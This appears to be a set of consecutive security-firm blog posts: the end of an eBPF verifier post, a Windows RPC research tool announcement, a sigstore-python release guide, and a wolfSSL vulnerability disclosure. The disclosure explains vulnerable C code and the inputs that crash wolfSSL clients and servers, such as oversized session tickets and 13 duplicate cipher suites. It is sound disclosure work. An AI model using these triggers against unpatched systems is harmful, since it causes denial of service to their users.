Because these issues will take a nontrivial amount of work, we invite the larger community to build upon the work we have released. While we have many ideas for improvements that will move the eBPF verifier closer to adoption, we believe there are others out there that could enhance this work with their own expertise. Although that initial work will enable rapid testing of all kernel versions once it’s complete, the harness will still need to be updated each time a kernel version is released to account for any internal changes.

However, the eBPF verifier is critical and complex infrastructure, and complexity is the enemy of security; when it is difficult to test complex code, it is difficult to feel confident in the security of that code. Thus, extracting the verifier into a testing harness is well worth the effort—though the amount of effort it requires should serve as a general reminder of the importance of testability.

Introducing RPC Investigator

A new tool for Windows RPC research

By Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the rich attack surface it affords exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there's always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.


Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, James Forshaw, the developer of the open source .NET library NtApiDotNet, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new NtApiDotNet functionality via PowerShell scripts and cmdlets in his NtObjectManager package—he included a small section on how to use the PowerShell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the NtApiDotNet platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from NtApiDotNet, we can build a more complete picture of ongoing RPC activity.


Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking Edit -> Settings. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, a symbol path of the form srv*c:\symbols*).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically C:\Users\(user)\AppData\Roaming\RpcInvestigator. To view this folder, simply navigate to View -> Logs. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the File -> All RPC ALPC Servers… menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server's image by selecting File -> Load from binary… and locating the image on disk, or by selecting File -> Load from service… and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item Library -> Servers to view all discovered RPC servers and Library -> Procedures to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to Library -> Refresh, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item Library -> Erase or manually delete the database file (rpcserver.db) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the File -> Load from binary… and File -> Load from service… menu items are automatically added to the library.

You can also export the entire library as text by selecting Library -> Export as Text.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select New Client.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by NtApiDotNet. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to Tools -> RPC Sniffer… and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.
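The start/stop correlation described here can be sketched as matching events on their ActivityId and subtracting timestamps. RPCI itself is written in C#, so the C below is only an illustration of the pairing logic, with invented structure and field names:

```c
enum evt_kind { CALL_START, CALL_STOP };

struct rpc_event {
    enum evt_kind kind;
    unsigned activity_id;   /* ETW ActivityId correlating start/stop pairs */
    unsigned timestamp;
};

/* Returns the duration of the call with the given activity ID, or -1
 * if a matched start/stop pair is not present in the trace. */
static int call_duration(const struct rpc_event *evts, int n, unsigned id)
{
    int start = -1, stop = -1;
    for (int i = 0; i < n; i++) {
        if (evts[i].activity_id != id)
            continue;
        if (evts[i].kind == CALL_START)
            start = (int)evts[i].timestamp;
        else
            stop = (int)evts[i].timestamp;
    }
    return (start >= 0 && stop >= start) ? stop - start : -1;
}
```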

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select Open in library or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”

Announcing a stable release of sigstore-python

By William Woodruff

Read the official announcement on the Sigstore blog as well!

Trail of Bits is thrilled to announce the first stable release of sigstore-python, a client implementation of Sigstore that we’ve been developing for nearly a year! This work has been graciously funded by Google’s Open Source Security Team (GOSST), who we’ve also worked with to develop pip-audit and its associated GitHub Actions workflow.

If you aren’t already familiar with Sigstore, we’ve written an explainer, including an explanation of what Sigstore is, how you can use it on your own projects, and how tools like sigstore-python fit into the overall codesigning ecosystem.

If you want to get started, it’s a single pip install away:

$ echo 'hello sigstore' > hello.txt
$ python -m pip install sigstore
$ sigstore sign hello.txt
$ sigstore verify identity hello.txt \
    --cert-identity '' \
    --cert-oidc-issuer ''

A usable, reference-quality Sigstore client implementation

Our goals with sigstore-python are two-fold:

  • Usability: sigstore-python should provide an extremely intuitive CLI and API, with 100 percent documentation coverage and practical examples for both.
  • Reference-quality: sigstore-python is just one of many Sigstore clients being developed, including for ecosystems like Go, Ruby, Java, Rust, and JavaScript. We’re not the oldest implementation, but we’re aiming to be one of the most authoritative in terms of succinctly and correctly implementing the intricacies of Sigstore’s security model.

We believe we’ve achieved both of these goals with this release. The rest of this post will demonstrate how we did so!

Usability: sigstore-python is for everybody

The sigstore CLI

One of the Sigstore project’s mottos is “Software Signing for Everybody,” and we want to stay true to that with sigstore-python. To that end, we’ve designed a public Python API and sigstore CLI that abstract the murkier cryptographic bits away, leaving the two primitives that nearly every developer is already familiar with: signing and verifying.

To get started, we can install sigstore-python from PyPI, where it’s available as sigstore:

$ python -m pip install sigstore
$ sigstore --version
sigstore 1.0.0

From there, we can create an input to sign, and use sigstore sign to perform the actual signing operation:

$ echo "hello, i'm signing this!" > hello.txt
$ sigstore sign hello.txt

Waiting for browser interaction...
Using ephemeral certificate:

Transparency log entry created at index: 10892071
Signature written to hello.txt.sig
Certificate written to hello.txt.crt
Rekor bundle written to hello.txt.rekor

On your desktop this will produce an OAuth2 flow that prompts you for authentication, while on supported CI providers it’ll intelligently select an ambient OpenID Connect identity!

This will produce three outputs:

  • hello.txt.sig: the signature for hello.txt itself
  • hello.txt.crt: a certificate for the signature, containing the public key needed to verify the signature
  • hello.txt.rekor: an optional “offline Rekor bundle” that can be used during verification instead of accessing an online transparency log

Verification looks almost identical to signing, since the sigstore CLI intelligently locates the signature, certificate, and optional Rekor bundle based on the input’s filename. To actually perform the verification, we use the sigstore verify identity subcommand:

$ # finds hello.txt.sig, hello.txt.crt, hello.txt.rekor
$ sigstore verify identity hello.txt \
    --cert-identity "..." \
    --cert-oidc-issuer "..."
OK: hello.txt

(What’s with the extra flags? Without them, we’d just be verifying the signature and certificate, and anybody can get a valid signature for any public input in Sigstore. To make sure that we’re actually verifying something meaningful, the sigstore CLI forces you to assert which identity the signature is expected to be bound to, which is then checked during certificate verification!)

However, that’s not all! Sigstore is not just for email identities; it also supports URI identities, which can correspond to a particular GitHub Actions workflow run, or some other machine identity. We can do more in-depth verifications of these signatures using the sigstore verify github subcommand, which allows us to check specific attestations made by the GitHub Actions runner environment:

$ # change this to any version!
$ v=0.10.0
$ repo=
$ release="${repo}/release/download"
$ sha=66581529803929c3ccc45334632ccd90f06e0de4

$ # download a distribution + certificate and signature
$ wget ${release}/v${v}/sigstore-${v}.tar.gz{,.crt,.sig}

$ # verify extended claims
$ sigstore verify github sigstore-${v}.tar.gz \
    --cert-identity \
      "${repo}/.github/workflows/release.yml@refs/tags/v${v}" \
    --sha ${sha} \
    --trigger release

This goes well beyond what we can prove with just a bare sigstore verify identity command: we’re now asserting that the signature was created by a release-triggered workflow run against commit 66581529803929c3ccc45334632ccd90f06e0de4, meaning that even if an attacker somehow managed to compromise our repository’s actions and sign for new inputs, they still couldn’t fool us into accepting the wrong signature for this release!

(--sha and --trigger are just a small sample of the claims that can be verified via sigstore verify github: check the README for even more!)

The brand-new sigstore Python APIs

In addition to the CLIs above, we’ve stabilized a public Python API! You can use this API to do everything that the sigstore CLI is capable of, as well as more advanced verification techniques (such as complex logical chains of “policies”).

Using the same signing example above, but with the Python APIs instead:

import io

from sigstore.sign import Signer
from sigstore.oidc import Issuer

contents = io.BytesIO(b"hello, i'm signing this!")

# NOTE: identity_token() performs an interactive OAuth2 flow;
# see other members of `sigstore.oidc` for other credential
# mechanisms.
issuer = Issuer.production()
token = issuer.identity_token()

signer = Signer.production()
result = signer.sign(input_=contents, identity_token=token)

And the same identity-based verification:

import base64
from pathlib import Path

from sigstore.verify import Verifier, VerificationMaterials
from sigstore.verify.policy import Identity

artifact = Path("hello.txt").open("rb")
cert = Path("hello.txt.crt").read_text()
signature = Path("hello.txt.sig").read_bytes()

materials = VerificationMaterials(
    input_=artifact,
    cert_pem=cert,
    signature=base64.b64decode(signature),
    offline_rekor_entry=None,
)

verifier = Verifier.production()

result = verifier.verify(
    materials,
    Identity(identity="...", issuer="..."),
)
The Identity policy corresponds to the sigstore verify identity subcommand, and hints at the Python API’s ability to express more complex relationships between claims. For example, here is how we could write the sigstore verify github verification from above:

from sigstore.verify import Verifier
from sigstore.verify.policy import (
    AllOf,
    Identity,
    GitHubWorkflowSHA,
    GitHubWorkflowTrigger,
)

materials = ...

verifier = Verifier.production()

result = verifier.verify(
    materials,
    AllOf(
        [
            Identity(identity="...", issuer="..."),
            GitHubWorkflowSHA("66581529803929c3ccc45334632ccd90f06e0de4"),
            GitHubWorkflowTrigger("release"),
        ]
    ),
)
…representing a logical AND between all sub-policies.

What’s next?

We’re making a commitment to semantic versioning for sigstore-python’s API and CLI: if you depend on sigstore~=1.0 in your Python project, you can safely assume that we will not make changes that break either without a major version bump.

With that in mind, a stable API enables many of our near-future goals for Sigstore in the Python packaging ecosystem: further integration into PyPI and the client-side packaging toolchain, as well as stabilization of our associated GitHub Action.

Work with us!

Trail of Bits is committed to the long term stability and expansion of the Sigstore ecosystem. If you’re looking to get involved in Sigstore or are working with your company to integrate it into your own systems, get in touch!

Keeping the wolves out of wolfSSL

By Max Ammann

Trail of Bits is publicly disclosing four vulnerabilities that affect wolfSSL: CVE-2022-38152, CVE-2022-38153, CVE-2022-39173, and CVE-2022-42905. The four issues, which have CVSS scores ranging from medium to critical, can all result in a denial of service (DoS). These vulnerabilities were discovered automatically by tlspuffin, a novel protocol fuzzer. This blog post will explore these vulnerabilities, then provide an in-depth overview of the fuzzer.

tlspuffin is a fuzzer inspired by formal protocol verification. Initially developed as part of my internship at LORIA, INRIA, France, it specifically targets cryptographic protocols like TLS and SSH.

During my internship at Trail of Bits, we pushed protocol fuzzing even further by supporting a new protocol (SSH), adding more fuzzing targets, and (re)discovering vulnerabilities. This work represents a milestone in the development of the first Dolev-Yao model-guided fuzzer. By supporting an additional protocol, we proved that our fuzzing approach is agnostic with respect to the protocol. Going forward, we aim to support other protocols such as QUIC, OpenVPN, and WireGuard.

Targeting wolfSSL

During my internship at Trail of Bits, we added several versions of wolfSSL as fuzzing targets. The wolfSSL library was an ideal choice because it was affected by two authentication vulnerabilities that were discovered in early 2022 (CVE-2022-25640 and CVE-2022-25638). That meant we could verify that tlspuffin works by using it to rediscover the known vulnerabilities.

As tlspuffin is written in Rust, we first had to write bindings to wolfSSL. While implementing the bindings, we discovered several bugs in wolfSSL’s OpenSSL compatibility layer, which we also reported to the wolfSSL team. With the bindings ready, we could let the fuzzer do its job: discovering weird states within wolfSSL.

Discovered Vulnerabilities

During my internship, I discovered several vulnerabilities in wolfSSL, which can result in a denial of service (DoS).

  • DOSC: CVE-2022-38153 allows MitM actors or malicious servers to perform a DoS attack against TLS 1.2 clients by intercepting and modifying a TLS packet. This vulnerability affects wolfSSL 5.3.0.
  • DOSS: CVE-2022-38152 is a DoS vulnerability against wolfSSL servers that use the wolfSSL_clear function instead of the sequence wolfSSL_free; wolfSSL_new. Resuming a session causes the server to crash with a NULL-pointer dereference. This vulnerability affects wolfSSL 5.3.0 to 5.4.0.
  • BUF: CVE-2022-39173 is a buffer overflow that causes a DoS of wolfSSL servers. It is triggered by pretending to resume a session and sending duplicate cipher suites in the Client Hello. It might allow an attacker to gain RCE on certain architectures or targets; however, this has not yet been confirmed. Versions of wolfSSL before 5.5.1 are affected.
  • HEAP: CVE-2022-42905 is caused by a buffer overread while parsing TLS record headers. Versions of wolfSSL before 5.5.2 are affected.

“A few CVEs for wolfSSL, one giant leap for tlspuffin.”

The vulnerabilities mark a milestone for the fuzzer: they are the first vulnerabilities found using this tool that have a far-reaching impact. We can also confidently say that these vulnerabilities would not have been easy to find with classical bit-level fuzzers. It’s especially intriguing that, on average, the fuzzer took less than one hour to discover each vulnerability and produce a crash.

While preparing the fuzzing setup for wolfSSL, we also discovered a severe memory leak that was caused by misuse of the wolfSSL API. This issue was reported to the wolfSSL team, who updated their documentation to help users avoid the leak. Additionally, several other code-quality issues have been reported to wolfSSL, and their team fixed all of our findings within one week of disclosure. If a “best coordinated disclosure” award existed, the wolfSSL team would definitely win it.

The following sections will focus on two of the vulnerabilities because of their higher impact and expressive attack traces.

DOSC: Denial of service against clients

In wolfSSL 5.3.0, MitM attackers or malicious servers can crash TLS clients. The bug lives in the AddSessionToCache function, which is called when the client receives a new session ticket from the server.

Let’s assume that each bucket of wolfSSL’s session cache contains at least one entry. As soon as a new session ticket arrives, the client reuses a previously stored cache entry to cache the new session. Additionally, because the new session ticket is quite large at 700 bytes, it is allocated on the heap using XMALLOC.

In the following example, SESSION_TICKET_LEN is 256:

if (ticLen > SESSION_TICKET_LEN) {
    ticBuff = (byte*)XMALLOC(ticLen, NULL,


This allocation leads to the initialization of cacheTicBuff, as ticBuff is already initialized, cacheSession->ticketLenAlloc is 0, and ticLen is 700:

if (ticBuff != NULL && cacheSession->ticketLenAlloc < ticLen) { 
    cacheTicBuff = cacheSession->ticket;


The cacheTicBuff is set to the ticket of a previous session, cacheSession->ticket. The memory to which cacheTicBuff points is not allocated on the heap; in fact, cacheTicBuff points to cacheSession->_staticTicket. This is problematic because the cacheTicBuff is later freed if it is not null.

if (cacheTicBuff != NULL)


The process aborts while executing the XFREE function, because the passed pointer was not allocated on the heap.

Note that the ticket length in itself is not the cause of the crash. This vulnerability is quite different from Heartbleed, the buffer over-read vulnerability discovered in OpenSSL. With wolfSSL, the crash is caused not by overflowing buffers but by a logical bug.

Finding weird states

The fuzzer discovered the vulnerability in about one hour. The fuzzer modified the NewSessionTicket (new_message_ticket) message by replacing an actual ticket with a large array of 700 bytes (large_bytes_vec). This mutation of an otherwise-sane trace leads to a call of XFREE on a non-allocated value. This eventually leads to a crash of the client that receives such a large ticket.

Visualized exploit for DOSC (CVE-2022-38153). Each box represents a TLS message. Each message is composed of different fields like a protocol version or a vector of cipher suites. The visualization was generated using the tlspuffin fuzzer and mirrors the structure of the DY attacker traces which will be introduced in the next section.

A single execution of the above trace is not enough to reach the vulnerable code. As the bug resides in the session cache of wolfSSL, we need to let the client cache fill up in order to trigger the crash. Empirically, we discovered that about 30 prior connections are needed to reliably crash the client. The reason for the seemingly random behavior is that the cache consists of multiple rows, or buckets; the default compilation configuration of wolfSSL contains 11 buckets. Based on the hash of the TLS session ID, sessions are stored in one of these buckets. The DoS is triggered only if the current bucket already contains a previous session.
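The bucket arithmetic can be sketched numerically. Assuming session IDs hash uniformly into the default 11 buckets (a simplification; this is an illustrative model, not wolfSSL’s exact hash), the chance that the bucket hit by a new connection is already occupied grows quickly with the number of prior sessions:

```python
# Probability that the session-cache bucket used by a new connection is
# already occupied, given n prior sessions hashed uniformly into the
# default 11 buckets (an illustrative model, not wolfSSL's exact hash).
BUCKETS = 11

def p_bucket_occupied(n_prior_sessions: int) -> float:
    # A fixed bucket stays empty only if every prior session hashed elsewhere.
    p_empty = ((BUCKETS - 1) / BUCKETS) ** n_prior_sessions
    return 1.0 - p_empty

for n in (5, 15, 30):
    print(f"{n:2d} prior sessions -> P(bucket occupied) = {p_bucket_occupied(n):.2f}")
```

With 30 prior connections, the probability is roughly 94 percent under this model, which is consistent with the empirical observation that about 30 connections reliably trigger the crash.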

Reproducing this vulnerability is difficult, as a prepared state is required to reach the behavior. In general, global state such as the wolfSSL session cache makes fuzzing more difficult to apply. Ideally, each execution of a program yields the same outputs given identical inputs. Reproduction and debugging become much harder when this assumption is violated because the program uses global state; this is a general challenge when fuzzing unknown targets.

Fortunately, tlspuffin allows researchers to recreate a program state that is similar to the one that was present when the fuzzer observed a crash. We were able to re-execute all the traces that the fuzzer rated as interesting, which allowed us to observe the crash of wolfSSL in a more controlled environment and to debug wolfSSL using GDB. After analyzing the call stack that led to the invalid free, it was clear that the bug was related to the session cache.

The root cause of DOSC lies in the usage of a shared global state. It was very surprising to find that wolfSSL shares this state between multiple invocations of the library. Conceptually, the lifetime of the session cache should be bound to the TLS context, which already serves as a container for TLS sessions. Each SSL session shares the state with the TLS context. Maintaining a global mutable state on top of that increases complexity throughout a codebase, so it should be used only when absolutely necessary.

BUF: Buffer overflow on servers

In versions of wolfSSL before 5.5.1, malicious clients can cause a buffer overflow during a resumed TLS 1.3 handshake. If an attacker resumes or pretends to resume a previous TLS session by sending a maliciously crafted Client Hello followed by another maliciously crafted Client Hello, then a buffer overflow is possible. A minimum of two Client Hellos must be sent: one that pretends to resume a previous session, and a second as a response to a Hello Retry Request message.

The malicious Client Hellos contain a list of supported cipher suites with at least ⌊sqrt(150)⌋ + 1 = 13 duplicates and fewer than 150 ciphers in total. The buffer overflow occurs in the second invocation of the RefineSuites function during a handshake.

/* Refine list of supported cipher suites to those common to server and
 * client.
 *
 * ssl         SSL/TLS object.
 * peerSuites  The peer's advertised list of supported cipher suites.
 */
static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)
{
    byte   suites[WOLFSSL_MAX_SUITE_SZ];
    word16 suiteSz = 0;
    word16 i, j;

    for (i = 0; i < ssl->suites->suiteSz; i += 2) {
        for (j = 0; j < peerSuites->suiteSz; j += 2) {
            if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&
                ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {
                suites[suiteSz++] = peerSuites->suites[j+0];
                suites[suiteSz++] = peerSuites->suites[j+1];
            }
        }
    }

    ssl->suites->suiteSz = suiteSz;
    XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));
}


The RefineSuites function expects a struct WOLFSSL that contains a list of acceptable ciphers suites at ssl->suites, as well as an array of peer cipher suites. Both inputs are bounded by WOLFSSL_MAX_SUITE_SZ, which is equal to 150 cipher suites or 300 bytes.

Let us assume that ssl->suites consists of a single cipher suite like TLS_AES_256_GCM_SHA384 and that the user-controllable peerSuites list contains the same cipher repeated 13 times. The RefineSuites function will iterate for each suite in ssl->suites over peerSuites and append the suite to the suites array if it is a match. The suites array has a maximum length of WOLFSSL_MAX_SUITE_SZ suites.

With this input, suites now holds 13 entries. The suites array is then copied back into the struct WOLFSSL in the last line of the listing above. Therefore, the ssl->suites array now contains 13 TLS_AES_256_GCM_SHA384 cipher suites.

During a presumably resumed TLS handshake, the RefineSuites function is called again if a Hello Retry Request is triggered by the client. The struct WOLFSSL is not reset in between and keeps the previous suites of 13 cipher suites. Because the TLS peer controls the peerSuites array, we assume that it again contains 13 duplicate cipher suites.

The RefineSuites function will again iterate for each element in ssl->suites over peerSuites and append each match to suites. Because the ssl->suites array already contains 13 TLS_AES_256_GCM_SHA384 cipher suites, a total of 13 x 13 = 169 cipher suites are written to suites. That exceeds the maximum of WOLFSSL_MAX_SUITE_SZ cipher suites the buffer can hold, and suites overflows on the stack.
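The counting argument can be checked with a short sketch that mirrors the nested loops of RefineSuites (names are borrowed from the C listing; this models the matching logic, not the real implementation):

```python
# Model of how duplicate cipher suites inflate the refined list across two
# RefineSuites calls. WOLFSSL_MAX_SUITE_SZ is the 150-suite capacity of the
# stack buffer in the C code above.
WOLFSSL_MAX_SUITE_SZ = 150

def refine(server_suites, peer_suites):
    # One entry per (server suite, matching peer suite) pair, exactly like
    # the nested loops in RefineSuites.
    return [p for s in server_suites for p in peer_suites if p == s]

server = ["TLS_AES_256_GCM_SHA384"]      # single supported suite
peer = ["TLS_AES_256_GCM_SHA384"] * 13   # 13 duplicates from the client

first = refine(server, peer)    # first Client Hello: 13 entries
second = refine(first, peer)    # after Hello Retry Request: 13 * 13 entries

print(len(first), len(second), len(second) > WOLFSSL_MAX_SUITE_SZ)
# 13 169 True
```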

So far, we have been unable to exploit this bug and, for example, gain remote code execution because the set of bytes that can overflow the suites buffer is small. Only valid cipher suite values can overflow the buffer.

Because of space constraints, we are not providing a detailed review of the mutations that are required in order to mutate a sane trace to an attack trace, as we did with DOSC.

To understand how we found these vulnerabilities, it is worth examining how tlspuffin was developed.

Next Generation Protocol Fuzzing

History has proven that implementations of cryptographic protocols are prone to errors. It’s easy to introduce logical flaws when translating specifications like RFCs or scientific articles into actual program code. In 2017, researchers discovered that the well-known WPA2 protocol suffered from severe flaws (KRACK). Vulnerabilities like FREAK, or authentication vulnerabilities like the wolfSSL bugs found in early 2022 (CVE-2022-25640 and CVE-2022-25638), support this idea.

It is challenging to fuzz implementations of cryptographic protocols. Unlike traditional fuzzing of file formats, cryptographic protocols require a specific flow of cryptographic and mutually dependent messages to reach deep protocol states.

Additionally, detecting logical bugs is a challenge of its own. AddressSanitizer enables security researchers to reliably find memory-related issues, but no automated detectors exist for logical bugs like authentication bypasses or loss of confidentiality.

These challenges are why INRIA and I set out to design tlspuffin. The fuzzer is guided by the so-called Dolev-Yao model, which has been used in formal protocol verification since the 1980s.

The Dolev-Yao Model

Formal methods have become an essential tool in the security analysis of cryptographic protocols. Modern tools like ProVerif or Tamarin feature a fully automated framework to model and verify security protocols. The ProVerif manual and DEEPSEC paper provide a good introduction to protocol verification. The underlying theory of these tools uses a symbolic model—the Dolev-Yao model—that originates from the work of Dolev and Yao.

With Dolev-Yao models, attackers have full control over the messages being sent within the communication network. Messages are modeled symbolically using a term algebra, which consists of a set of function symbols and variables. This means that messages can be represented by applying functions over variables and other functions.
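As a concrete illustration, here is a minimal term algebra in Python (a sketch of the idea, not tlspuffin’s internal representation): a term is either a variable or a function symbol applied to sub-terms.

```python
# A minimal symbolic term algebra: messages are either variables or a
# function symbol applied to sub-terms, as in the Dolev-Yao model.
from dataclasses import dataclass

@dataclass(frozen=True)
class Var:
    name: str

@dataclass(frozen=True)
class App:
    symbol: str      # function symbol, e.g. "aenc" or "pk"
    args: tuple = () # sub-terms; empty for constants

def show(term) -> str:
    """Render a term in the usual f(x, g(y)) notation."""
    if isinstance(term, Var):
        return term.name
    if not term.args:
        return term.symbol
    return f"{term.symbol}({', '.join(show(a) for a in term.args)})"

# An attacker term: decrypt a handle h_1 with the attacker key, then
# re-encrypt it for Bob's public key.
h1, sk_E, sk_B = Var("h_1"), Var("sk_E"), Var("sk_B")
msg = App("aenc", (App("adec", (h1, sk_E)), App("pk", (sk_B,))))
print(show(msg))  # aenc(adec(h_1, sk_E), pk(sk_B))
```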

An adversary can eavesdrop on, inject, or manipulate messages; the Dolev-Yao model is meant to simulate real-world attacks on these protocols, such as Man-in-the-Middle (MitM) attacks. The cryptographic primitives are modeled through abstract semantics because the Dolev-Yao model focuses on finding logical protocol flaws and is not concerned with the correctness of cryptographic primitives. Because the primitives are described through abstract semantics, no real implementation of, for example, RSA or AES is defined in the Dolev-Yao model.

Attacks on cryptographic protocols have already been found using this model. The TLS specification underwent various analyses by these tools in 2006 and 2017, which led to fixes in RFC drafts. But in order to fuzz implementations of protocols, instead of verifying their specifications, we need to do things slightly differently: we replace the abstract semantics with concrete semantics that include actual implementations of the primitives.

The tlspuffin fuzzer is guided by this symbolic formal model, which means that it can execute any protocol flow that is representable in the Dolev-Yao model, and it can also generate previously unseen protocol executions. The following section explains the notion of Dolev-Yao traces, which are loosely based on the Dolev-Yao model.

